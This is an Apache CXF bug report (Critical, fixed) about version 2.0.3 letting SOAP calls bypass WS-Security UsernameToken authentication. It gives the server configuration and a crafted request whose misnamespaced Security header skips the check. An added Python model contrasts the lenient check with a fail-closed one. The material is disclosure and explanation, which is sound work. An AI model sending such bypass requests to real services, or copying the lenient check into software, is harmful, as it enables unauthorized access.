Details
Type: Bug
Status: Closed
Priority: Critical
Resolution: Fixed
2.0.3
None
Environment: Tomcat 5.5, Spring 2 and CXF 2.0.3 for the server and Flex WS-client
Moderate
Description
It is possible to bypass the security checks configured with WS-Security.
Server configured with a UsernameToken WS-Security authentication with Spring:
<jaxws:endpoint id="helloWorld" implementor="service.impl.HelloWorldImpl" address="/HelloWorld">
<jaxws:inInterceptors>
<bean class="org.apache.cxf.binding.soap.saaj.SAAJInInterceptor"/>
<bean class="org.apache.cxf.ws.security.wss4j.WSS4JInInterceptor">
<constructor-arg>
<map>
<entry key="action" value="UsernameToken"/>
<entry key="passwordType" value="PasswordDigest"/>
<entry key="passwordCallbackClass" value="service.security.ServerPasswordHandler"/>
</map>
</constructor-arg>
</bean>
<bean class="org.apache.cxf.interceptor.LoggingInInterceptor"/>
<bean class="org.apache.cxf.interceptor.LoggingOutInterceptor"/>
</jaxws:inInterceptors>
</jaxws:endpoint>
When a SOAP message is created and sent with the following header, the server does not process the authentication and returns the response:
<SOAP-ENV:Envelope>
<SOAP-ENV:Header>
<ns0:Security>
<ns0:wsse>Security</ns0:wsse>
</ns0:Security>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns0:sayHi>
<name>Loïc</name>
</ns0:sayHi>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
So it is possible to bypass all the configured security checks and use the service.
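The following is an added example, not code from the report or from CXF/WSS4J: a small Python model of the UsernameToken/PasswordDigest check that the WSS4JInInterceptor configuration above is meant to enforce, with the reported "no security header, so nothing to check, so let it through" branch beside the fail-closed version. The namespace URIs are the WS-Security 1.0 and SOAP 1.1 constants; the user table, the service namespace http://service.example/, the constructed request messages and all helper names are assumptions made for illustration.

```python
"""Added example, not from the CXF report or the CXF code base: a small model
of the UsernameToken/PasswordDigest check the WSS4JInInterceptor configuration
above performs, with the "no security header -> pass" branch the report
describes next to the fail-closed version.  Namespace URIs are the WS-Security
1.0 / SOAP 1.1 constants; the user table, the service namespace
http://service.example/ and the helper names are assumptions."""
import base64
import hashlib
import xml.etree.ElementTree as ET

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
WSSE = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"
WSU = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"
PASSWORD_DIGEST = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest"
SERVICE_NS = "http://service.example/"   # assumed namespace of the HelloWorld service

# Stand-in for service.security.ServerPasswordHandler (assumed credentials).
PASSWORDS = {"alice": "s3cret"}


def password_digest(nonce_b64, created, password):
    """UsernameToken profile digest: Base64(SHA-1(nonce + created + password))."""
    data = base64.b64decode(nonce_b64) + created.encode() + password.encode()
    return base64.b64encode(hashlib.sha1(data).digest()).decode()


def process_security_header(envelope_xml):
    """Returns the list of verified WS-Security actions, or None when the SOAP
    header carries no wsse:Security element at all (namespace-aware lookup, so
    the report's <ns0:Security> does not count).  Raises on a bad token."""
    root = ET.fromstring(envelope_xml)
    header = root.find(f"{{{SOAP_ENV}}}Header")
    security = header.find(f"{{{WSSE}}}Security") if header is not None else None
    if security is None:
        return None
    results = []
    for token in security.findall(f"{{{WSSE}}}UsernameToken"):
        user = token.findtext(f"{{{WSSE}}}Username")
        pw = token.find(f"{{{WSSE}}}Password")
        nonce = token.findtext(f"{{{WSSE}}}Nonce")
        created = token.findtext(f"{{{WSU}}}Created")
        if pw is None or None in (user, nonce, created) or pw.get("Type") != PASSWORD_DIGEST:
            raise PermissionError("malformed UsernameToken")
        if user not in PASSWORDS or pw.text != password_digest(nonce, created, PASSWORDS[user]):
            raise PermissionError("username/password digest mismatch")
        results.append("UsernameToken")
    return results


def check(envelope_xml, actions=("UsernameToken",), fail_closed=True):
    """True if the message may reach the service.  fail_closed=False reproduces
    the reported behaviour: no wsse:Security header means no results, and the
    message is let through without any of the configured actions being met."""
    try:
        results = process_security_header(envelope_xml)
    except PermissionError:
        return False                     # WSS4J raises a SOAP fault here
    if results is None:
        return not fail_closed           # the bypass from the report is this branch
    return all(action in results for action in actions)


def sayhi_envelope(header_xml, extra_ns=""):
    """Constructed SOAP 1.1 request for sayHi with the given header content."""
    return (f'<SOAP-ENV:Envelope xmlns:SOAP-ENV="{SOAP_ENV}" xmlns:ns0="{SERVICE_NS}"{extra_ns}>'
            f"<SOAP-ENV:Header>{header_xml}</SOAP-ENV:Header>"
            f"<SOAP-ENV:Body><ns0:sayHi><name>Loïc</name></ns0:sayHi></SOAP-ENV:Body>"
            "</SOAP-ENV:Envelope>")


# The header from the report: a Security element in the service namespace, not wsse.
BYPASS_MSG = sayhi_envelope("<ns0:Security><ns0:wsse>Security</ns0:wsse></ns0:Security>")
# A real but empty wsse:Security header (constructed).
EMPTY_SECURITY_MSG = sayhi_envelope("<wsse:Security/>", f' xmlns:wsse="{WSSE}"')


def username_token_msg(user, password, nonce_b64="c2FsdDEyMzQ1Njc4", created="2008-01-01T00:00:00Z"):
    """Constructed request carrying a PasswordDigest UsernameToken for `user`."""
    digest = password_digest(nonce_b64, created, password)
    header = (f"<wsse:Security><wsse:UsernameToken><wsse:Username>{user}</wsse:Username>"
              f'<wsse:Password Type="{PASSWORD_DIGEST}">{digest}</wsse:Password>'
              f"<wsse:Nonce>{nonce_b64}</wsse:Nonce><wsu:Created>{created}</wsu:Created>"
              "</wsse:UsernameToken></wsse:Security>")
    return sayhi_envelope(header, f' xmlns:wsse="{WSSE}" xmlns:wsu="{WSU}"')


if __name__ == "__main__":
    for name, msg in [("bypass", BYPASS_MSG), ("empty", EMPTY_SECURITY_MSG),
                      ("alice/ok", username_token_msg("alice", "s3cret")),
                      ("alice/bad", username_token_msg("alice", "wrong"))]:
        print(f"{name:10} lenient={check(msg, fail_closed=False)!s:5} fail_closed={check(msg)}")
```

The point the model makes is that the request from the report never enters WS-Security processing at all: `<ns0:Security>` is not in the wsse namespace, so a namespace-aware lookup finds no header, yields no results, and a check that equates "no results" with "nothing failed" lets the call through. The fail-closed variant instead requires a verified result for every configured action (here `UsernameToken`), so both the mis-namespaced header and an empty `<wsse:Security/>` are refused, while a correct digest over nonce, created timestamp and password still passes.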